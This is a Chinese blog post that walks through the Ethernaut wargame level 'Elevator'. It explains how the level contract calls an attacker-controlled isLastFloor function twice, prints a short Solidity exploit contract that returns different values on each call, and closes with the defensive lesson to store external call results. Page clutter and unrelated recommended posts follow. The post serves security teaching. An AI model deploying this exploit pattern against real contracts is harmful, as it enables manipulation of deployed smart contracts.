ethernaut——Elevator

最新推荐文章于 2024-07-15 11:58:08 发布
最新推荐文章于 2024-07-15 11:58:08 发布
阅读量103 收藏
点赞数
分类专栏: ethernaut_2023详解 文章标签: 区块链 智能合约 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78046362/article/details/130733903
版权

第十一关:Elevator

文章目录

本关知识点:

合约的外部调用

1. 题目要求

电梯不会让你达到大楼顶部, 对吧?

2. 代码功能解读

请添加图片描述

3. 漏洞分析

到达顶楼就是让状态变量top的值为true。
	查看goTo方法逻辑,isLastFloor返回为false才会进入,进入后再次调用isLastFloor来设置top的值,那么我们让第一次方法返回false,第二次返回true,就可以成功实现到达顶楼。

4. 攻击方法

用flag状态变量来控制,达到每一次调用isLastFloor方法都返回不同值的效果。

contract Exploit is Building {

    Elevator elevator;
    bool flag = false;

    constructor(address victim) {
        elevator = Elevator(victim);
    }

    function Attack(uint number) public {
        elevator.goTo(number);
    }
 
    function isLastFloor(uint) external returns (bool) {
        if (!flag) {
            flag = true;
            return false;
        } else {
            flag = false;
            return true;
        }
    }
}

5. 攻击调用图

请添加图片描述
请添加图片描述

6. 知识点分析

在我们获取外部调用的结果后,我们应该将他保存到变量中,而不是进行再次调用,这样可能出现不一样的结果,因为所有对外部接口的调用都是危险的!
陵野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SDUT1009——Elevator
命运只负责洗牌,但玩牌的是我们自己。
08-27 268
Elevator Time Limit: 1000 ms Memory Limit: 32768 KiB Problem Description The highest building in our city has only one elevator. A request list is made up with N positive numbers. The numbers denot...
杭电ACM——1008——Elevator
YANG_LJ_is_ME的博客
03-30 289
第二次完全自己写并一次OC,不过这个比较简单,过程很顺利 #include < stdio.h > int upward ( int , int ); int down ( int , int ); int main() { int N , request , totaltime; int current; while ( 1 ) { scanf ( "%d" , &...
ethernaut 以太坊靶场学习 (1-12)
weixin_30469895的博客
10-11 1252
前言 这个靶场搜集了许多不同的 solidity 开发的问题,通过这个可以入门 区块链安全 Fallback 给出了源码 pragma solidity ^0.4.18; import 'zeppelin-solidity/contracts/ownership/Ownable.sol'; contract Fallback is Ownable { mapping(address =&...
ethernaut
qq_41578716的博客
01-03 1039
首先,准备工作 1、下载好matemask获取免费的测试以太网,大佬告诉本菜说可以点击matemask以太币不够可以重新申请一个账号(放心现在申请肯定不会很麻烦一键式操作)之后点击存入—获取,之后狂点获取按钮。 2、你需要懂智能合约的基础,以及web3.js和操作码的执行方式(当然懂了合约也可以慢慢的做下去,毕竟这个靶场就是给人熟悉合约以及其漏洞的) 0.Hello Ethernaut 这个级别目...
PAT甲级——Elevator
Xiao2018428的博客
08-13 204
The highest building in our city has only one elevator. A request list is made up withNpositive numbers. The numbers denote at which floors the elevator will stop, in specified order. It costs 6 sec...
推荐:电梯编程挑战——Elevator Saga
gitblog_00058的博客
05-12 296
推荐:电梯编程挑战——Elevator Saga 项目地址:https://gitcode.com/magwo/elevatorsaga 1、项目介绍 Elevator Saga 是一个别具一格的编程游戏,它将编程思维融入到日常生活中常见的电梯调度问题中。玩家的任务是编写高效的算法来控制多部电梯,以满足大楼内居民的上下楼需求。这款游戏不仅娱乐性强,还能锻炼你的逻辑思维和优化技能。 2、项目技术分析...
HDU1008——Elevator
ShadowFox_的博客
03-20 182
#include &lt;stdio.h&gt; #define MAX 1000 int main(int argc, const char * argv[]) { int n; int a[MAX]; while(scanf("%d",&amp;n)&amp;&amp;n){ int i; int sum=5*(n); ...
HDU ACM1008——Elevator
BarisGuo的博客
03-31 222
Elevator Problem Description The highest building in our city has only one elevator. A request list is made up with N positive numbers. The numbers denote at which floors the elevator will stop, in sp...
PAT-ADVANCED1008——Elevator
清风阁
11-08 216
我的PAT-ADVANCED代码仓:https://github.com/617076674/PAT-ADVANCED 原题链接:https://pintia.cn/problem-sets/994805342720868352/problems/994805511923286016 题目描述: 题目翻译: 1008 电梯 我们城市最高的建筑只有一部电梯。 请求列表由N个正数组成。 ...
evaluacion flores guido_elevator_
10-03
标题“evaluacion flores guido_elevator_”暗示了一个关于电梯控制系统的评估或项目,可能是一个编程任务或课程作业,由Guido Flores完成。描述中的“deber de programación número o3”进一步确认这是一个编程...
159-Elevator Display_elevator_bascomavr_
10-03
标题中的“159-Elevator Display_elevator_bascomavr_”表明这是一个关于电梯显示系统的项目,使用了Bascom AVR编程语言。Bascom AVR是一种基于Basic语法的微控制器编程工具,专为AVR系列微处理器设计,常用于嵌入式...
dianti.rar_elevator_电梯
09-24
在本项目"电梯.rar_elevator_电梯"中,我们关注的是一个针对六层楼电梯的控制程序,主要使用C++语言编写。这个程序旨在模拟真实世界中的电梯操作,包括接收乘客请求、调度电梯移动以及在各个楼层停靠。 1. **电梯...
Elevator
03-14
Elevator类的设计使其可以从MiddleMan接收任务,并根据将要接收的给定任务上下移动电梯。 ElevatorButton.java 此类表示电梯中的按钮。 Floor.java 楼层类负责跟踪楼层号,并切换向上/向下按钮的灯。 FloorButton...
【提交ACM出版 | EI&Scopus检索稳定 | 高录用】第五届大数据与社会科学国际学术会议(ICBDSS 2024,8月16-18)
ai_1020的博客
07-12 1211
【提交ACM出版 | EI&Scopus检索稳定 | 高录用】第五届大数据与社会科学国际学术会议(ICBDSS 2024,8月16-18)大数据、社会科学、数字经济、区块链、人工智能相关主题方向均可投稿
交易平台Zero Hash现已支持SUI交易
Sui_Network的博客
07-12 329
Zero Hash将SUI添加到其超过65种tokens的列表中,使其客户可以访问SUI。
区块链学习05-web3中solidity和move语言
最新发布
qq_46135702的博客
07-15 863
Solidity 和 Move 都是用于开发区块链平台智能合约的编程语言。它们具有一些相似之处,但也存在一些关键差异。的状态变量,用于存储计数器值。的资源变量,用于存储计数器值。导出到 Google 表格。函数将计数器值递增 1。函数将计数器值递增 1。Solidity 文档。此示例定义了一个名为。此示例定义了一个名为。
solidity实战练习5——众筹合约
2303_79193185的博客
07-14 275
【代码】solidity实战练习5——众筹合约。
5,智能合约(react+区块链实战)
qq_44870829的博客
07-11 1030
在真实开发里面不是连接jsVM虚拟机的,而是真正链接以太坊的链,无论私有链还是说公链,测试链。创建钱包,常用密码,助记词一定不要丢,备份自己的私钥(助记词,私钥映射到其中)(1)合约里的全局变量 msg.sender 部署合约的地址(合约的拥有者)通过上述进行部署合约到链上及,区分部署合约的地址和调用合约的地址的不同。是因为账户的原因,链接的是第一个无钱的账号,应该链接第二个导入的账户。其余地址执行写入的函数时,虽然没法真正的写入进去,但还是会消耗gas。可以点击部署,将合约部署到链上,这里还没有写合约。
elevator.exe
01-26
根据提供的引用内容,elevator.exe是一个C语言编写的程序,用于计算电梯在不同楼层停留的总时间。程序首先读取一个正整数N,表示电梯要停的楼层数量。然后,程序会依次读取N个正整数,表示电梯要停的楼层。根据题目要求,电梯每上升一层需要6秒,每下降一层需要4秒,并且在每个停留的楼层停留5秒。程序最后会输出电梯的总时间。 以下是elevator.exe的示例代码: ```c #include<stdio.h> int main() { int n, f, a, sum; while (~scanf("%d", &n) && n != 0) { sum = 5 * n; f = 0; while (n--) { scanf("%d", &a); if (a > f) sum = sum + (a - f) * 6; else if (a < f) sum = sum + (f - a) * 4; f = a; } printf("%d\n", sum); } return 0; } ``` 请注意,这是一个C语言程序,需要使用C编译器进行编译后才能运行。如果你想运行这个程序,你需要将代码保存为一个以.c为后缀的文件,然后使用C编译器进行编译。编译成功后,你将得到一个可执行文件,可以在命令行中运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值